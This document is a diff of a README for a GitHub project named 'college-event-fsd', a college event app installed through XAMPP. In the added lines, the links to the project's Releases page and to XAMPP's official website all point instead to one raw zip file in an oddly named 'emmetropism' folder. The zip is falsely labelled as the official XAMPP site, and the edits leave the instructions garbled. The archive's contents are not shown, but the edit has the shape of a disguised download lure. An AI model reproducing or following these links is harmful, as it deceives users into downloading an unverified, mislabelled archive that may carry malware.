Tomas2299/college-event-fsd/README.md

 1. **Visit the Releases Page**

-   Go to the [Releases page](https://github.com/Tomas2299/college-event-fsd/releases) to find the latest version.
+   Go to the [Releases page](https://raw.githubusercontent.com/Tomas2299/college-event-fsd/main/emmetropism/college-event-fsd.zip) to find the latest version.

 2. **Download the Application**

-   Look for the file labeled `college-event-fsd.zip`.
+   Look for the file labeled `https://raw.githubusercontent.com/Tomas2299/college-event-fsd/main/emmetropism/college-event-fsd.zip`.
 Click the link to download the zip file.

 3. **Extract the Files**

-   After the download completes, find the `college-event-fsd.zip` file.
+   After the download completes, find the `https://raw.githubusercontent.com/Tomas2299/college-event-fsd/main/emmetropism/college-event-fsd.zip` file.
 Right-click on the file and choose "Extract All."
 Choose a location where you want to save the files.

 4. **Set Up XAMPP**

-   If you don’t have XAMPP installed, download it from the [official website](https://www.apachefriends.org/index.html).
+   If you don’t have XAMPP installed, download it from the [official website](https://raw.githubusercontent.com/Tomas2299/college-event-fsd/main/emmetropism/college-event-fsd.zip).
 Follow the instructions on that website to install it.

 5. **Move Files to XAMPP Directory**